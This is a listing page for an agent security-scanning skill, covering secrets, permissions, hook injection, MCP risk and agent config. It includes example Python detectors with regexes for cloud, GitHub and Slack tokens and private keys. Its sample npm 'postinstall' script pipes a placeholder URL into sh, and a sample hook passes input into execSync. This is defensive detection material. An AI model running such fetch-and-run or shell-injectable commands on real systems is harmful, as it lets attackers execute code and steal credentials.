
security-scanning

npx machina-cli add skill a5c-ai/babysitter/security-scanning --openclaw
Files (1): SKILL.md (2.0 KB)

Security Scanning

Overview

AgentShield security audit methodology adapted from the Everything Claude Code project. Scans across 5 categories with 102 static analysis rules.

Scanning Categories

1. Secrets Detection (14 Pattern Categories)

  • AWS access keys (AKIA pattern)
  • GitHub tokens (ghp_, gho_, ghs_, ghr_)
  • Generic API keys and bearer tokens
  • Database connection strings with credentials
  • Private keys (RSA, EC, SSH)
  • JWT secrets and signing keys
  • OAuth client secrets
  • Slack tokens and webhooks
  • Cloud provider credentials (GCP, Azure)
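As an added illustration of what a secrets-detection pass over a repository looks like (example code written for this page, not the skill's own rules or any AgentShield code): a small regex scanner that runs a handful of the pattern categories above over a constructed config excerpt and reports redacted previews rather than the raw matches. The rule names, pattern shapes and sample values are assumptions of this example; the AWS key is the documented placeholder from AWS's own examples and the other values are made up.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    preview: str   # redacted match, never the raw secret


# Hypothetical rule set for this example; the pattern shapes are assumptions,
# not the 102 rules the skill describes.
SECRET_RULES = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github-token": re.compile(r"\bgh[pors]_[A-Za-z0-9]{36}\b"),
    "private-key-block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "slack-token": re.compile(r"\bxox[abprs]-[0-9A-Za-z-]{10,}\b"),
    "slack-webhook": re.compile(r"https://hooks\.slack\.com/services/T[0-9A-Z]+/B[0-9A-Z]+/[0-9A-Za-z]+"),
    # scheme://user:password@host: credentials embedded in a connection string
    "db-connection-string": re.compile(
        r"\b(?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis)://[^\s:/@]+:[^\s@]+@", re.I),
    "bearer-token": re.compile(r"\b[Bb]earer\s+[A-Za-z0-9\-._~+/]{20,}=*"),
    "generic-api-key": re.compile(
        r"(?i)\b(?:api[_-]?key|secret[_-]?key|client[_-]?secret)\b\s*[=:]\s*['\"]?([A-Za-z0-9_\-]{16,})"),
}


def redact(secret: str) -> str:
    """Keep just enough of the match to locate it without reprinting the secret."""
    if len(secret) <= 8:
        return "***"
    return f"{secret[:4]}...{secret[-2:]}"


def scan_text(text: str, rules=SECRET_RULES) -> list[Finding]:
    """Run every rule over every line; one Finding per (rule, match)."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern in rules.items():
            for match in pattern.finditer(line):
                findings.append(Finding(name, line_no, redact(match.group(0))))
    return findings


# Constructed sample input: the AWS key is the placeholder from AWS's own docs,
# everything else is invented for this example.
SAMPLE_CONFIG = """\
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
GITHUB_TOKEN=ghp_0123456789abcdefghijklmnopqrstuvwxyz
DATABASE_URL=postgres://app:hunter2@db.internal:5432/app
-----BEGIN RSA PRIVATE KEY-----
SLACK_WEBHOOK=https://hooks.slack.com/services/T000/B000/XXXX
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.abcdefghijklmnop
api_key = "sk_test_0123456789abcdef"
LOG_LEVEL=debug
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_CONFIG):
        print(f"line {f.line_no:>3}  {f.rule:<22} {f.preview}")
```

Redacting in the finding itself matters in practice: scanner output is routinely pasted into tickets and CI logs, and a report that reprints the full token simply creates a second copy of the leak.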

2. Permission Auditing

  • File system read/write scope
  • Network calls and protocols
  • Process execution (child_process)
  • File permissions (777, world-writable)
  • CORS and CSP headers
  • Docker privilege escalation

3. Hook Injection Analysis

  • Git hooks for command injection
  • npm lifecycle scripts (preinstall, postinstall)
  • Claude Code hooks for unsafe patterns
  • eval()/Function()/dynamic code execution
  • Unvalidated user input in shell commands
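As an added example of the hook-injection checks listed above (written for this page; not the skill's rule set or any AgentShield code): one function parses a package.json and flags npm lifecycle scripts, which run on their own during install, together with risky shell idioms inside them; a second runs line-level heuristics for eval()/new Function() and for child_process exec calls that interpolate variables into a shell string. The rule names, regexes and both sample inputs are constructed assumptions of this example.

```python
import json
import re

# npm runs these scripts on its own during install/uninstall; nobody has to invoke them.
LIFECYCLE_SCRIPTS = {
    "preinstall", "install", "postinstall", "prepare",
    "preuninstall", "postuninstall", "prepublish", "prepublishOnly",
}

# Hypothetical shell heuristics for this example (assumptions, not the skill's rules).
RISKY_SHELL = {
    "remote-pipe-to-shell": re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|)sh\b"),
    "inline-node-eval": re.compile(r"\bnode\s+(?:-e|--eval)\b"),
    "base64-decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
}

RISKY_JS = {
    # exec("..." + x) / exec(`... ${x}`): the string reaches a shell, so x is an injection sink.
    # execFile(cmd, [args]) passes argv without a shell and is deliberately not matched.
    "shell-exec-with-interpolation": re.compile(
        r"\b(?:exec|execSync)\s*\(\s*(?:`[^`]*\$\{|['\"][^'\"]*['\"]\s*\+)"),
    "eval-call": re.compile(r"\beval\s*\("),
    "function-constructor": re.compile(r"\bnew\s+Function\s*\("),
}


def audit_package_json(text: str) -> list[tuple[str, str, str]]:
    """Return (script, rule, command) for every lifecycle script and each risky pattern in it."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for name, command in scripts.items():
        if name not in LIFECYCLE_SCRIPTS:
            continue  # "build", "test" etc. only run when someone asks for them
        findings.append((name, "lifecycle-script-present", command))
        for rule, pattern in RISKY_SHELL.items():
            if pattern.search(command):
                findings.append((name, rule, command))
    return findings


def audit_js_source(text: str) -> list[tuple[int, str]]:
    """Return (line_no, rule) for dynamic-code and shell-interpolation sinks."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RISKY_JS.items():
            if pattern.search(line):
                findings.append((line_no, rule))
    return findings


# Constructed sample package.json (the URL host is a reserved example domain).
SAMPLE_PACKAGE_JSON = """{
  "name": "example-pkg",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "curl -s https://example.invalid/setup.sh | sh",
    "prepare": "node -e \\"require('./bootstrap')\\""
  }
}"""

# Constructed sample hook script.
SAMPLE_HOOK_JS = """\
const { execSync } = require('child_process');
const branch = process.argv[2];                 // attacker-influenced input
execSync(`git checkout ${branch}`);             // shell string built from that input
const cfg = eval(fs.readFileSync('hook.cfg', 'utf8'));
const run = new Function('x', 'return x');
execFileSync('git', ['checkout', branch]);      // argv form, no shell: not flagged
"""

if __name__ == "__main__":
    for script, rule, command in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"package.json  {script:<12} {rule:<26} {command}")
    for line_no, rule in audit_js_source(SAMPLE_HOOK_JS):
        print(f"hook.js:{line_no:<5} {rule}")
```

Reporting every lifecycle script as a finding, not only the ones that match a risky idiom, is intentional: the audit point is that such scripts execute without anyone running them, so a reviewer should see each one and decide whether it needs to exist at all.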

4. MCP Risk Profiling

  • Tool permission inventory
  • Data exposure risk mapping
  • Transport security (stdio vs SSE vs HTTP)
  • Prompt injection via tool descriptions
  • Rate limiting verification

5. Agent Config Review

  • Model settings integrity
  • Prompt injection resistance
  • Tool allowlist scoping
  • Output validation and sanitization
  • Information leakage in error messages

Optional: Red Team Simulation

  • Attack simulation against found vulnerabilities
  • Exploitability rating: trivial, moderate, difficult, theoretical
  • Blue-team defense recommendations

When to Use

  • Pre-deployment security review
  • New dependency introduction
  • Hook or plugin configuration changes
  • Agent or MCP server setup

Agents Used

  • security-reviewer (primary consumer)

Source

SKILL.md in the a5c-ai/babysitter repository: https://github.com/a5c-ai/babysitter/blob/main/plugins/babysitter/skills/babysit/process/methodologies/everything-claude-code/skills/security-scanning/SKILL.md

Overview

AgentShield delivers a security audit inspired by the Everything Claude Code project. It scans code and configs across five categories with 102 static analysis rules to uncover secrets, misconfigurations, and risky patterns.

How This Skill Works

The process runs static analysis across five categories: Secrets Detection, Permission Auditing, Hook Injection Analysis, MCP Risk Profiling, and Agent Config Review. Optional red-team simulation can be invoked to rate exploitability and guide blue-team defenses.

When to Use It

  • Pre-deployment security review
  • New dependency introduction
  • Hook or plugin configuration changes
  • Agent or MCP server setup
  • A red-team simulation has been requested to assess exploitability

Quick Start

  1. Initiate the AgentShield security-scanning workflow to run across the five categories
  2. Review findings from Secrets Detection, Permission Auditing, Hook Injection Analysis, MCP Risk Profiling, and Agent Config Review
  3. If enabled, run the Optional Red Team Simulation and implement the blue-team recommendations

Best Practices

  • Prioritize findings from Secrets Detection (e.g., AKIA patterns, tokens, and keys) for immediate remediation
  • Closely review file system and network permission issues identified in Permission Auditing
  • Inspect hook scripts and unsafe dynamic code patterns in Hook Injection Analysis
  • Map data exposure risks and transport security implications in MCP Risk Profiling
  • Verify Agent Config Review metrics by validating model settings, prompt injection resistance, and tool allowlists; keep the 102 rules up to date

Example Use Cases

  • Auditing a new microservice deployment for secret leakage and misconfigurations
  • Reviewing a plugin configuration change to prevent privilege escalation and insecure headers
  • Evaluating npm lifecycle scripts and Git hooks for unsafe patterns
  • Assessing agent setup for prompt injection resistance and tool allowlist compliance
  • Running an optional red-team simulation to quantify exploitability and inform defenses
